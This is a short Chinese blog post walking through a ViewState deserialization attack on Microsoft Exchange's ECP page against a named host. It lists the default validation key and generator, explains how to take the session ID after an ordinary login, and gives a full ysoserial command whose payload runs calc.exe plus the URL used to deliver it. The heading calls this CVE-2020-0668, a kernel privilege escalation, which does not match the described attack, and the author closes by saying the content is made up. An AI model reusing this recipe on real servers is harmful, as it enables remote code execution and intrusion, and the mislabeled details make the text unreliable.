• CVE-2020-0668(Microsoft Windows Kernel权限提升漏洞)


    • 目标:mail.sync.net

    1.需要四个参数,分别为:

    --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因)
    --validationalg = SHA1(默认,漏洞产生原因)
    --generator=B97B4E27(基本默认)
    --viewstateuserkey = ASP.NET_SessionId(手工获取,变量,每次登陆都不一致)
    	获取方式:普通账号登录https://ip/ecp/default.aspx	viewstateuserkey位于default.aspx-->Headers-->ASP.NET_SessionId中:
    
    99566ec5-d60166d1477410aa-4576-a8b9-
    

    2.生成序列化数据,(弹个计算器)

    ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="99566ec5-d60166d1477410aa-4576-a8b9-" --isdebug –islegacy
    

    3.序列化数据url编码:

    4.构造链接并访问:

    https://mail.sync.net/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=
    

    目标机器上弹出计算器,此处无图, 因为上面的东西都是我瞎编的瞎编的瞎编的瞎编的瞎编的

  • 相关阅读:
    disabled
    C# 实例化顺序
    session问题
    Node js文件系统
    Node js WEB模块
    Node js GET POST请求
    Node js路由
    Node js函数
    Node js模块系统
    Node js 安装+回调函数+事件
  • 原文地址:https://www.cnblogs.com/mrhonest/p/14306463.html
Copyright © 2020-2023  润新知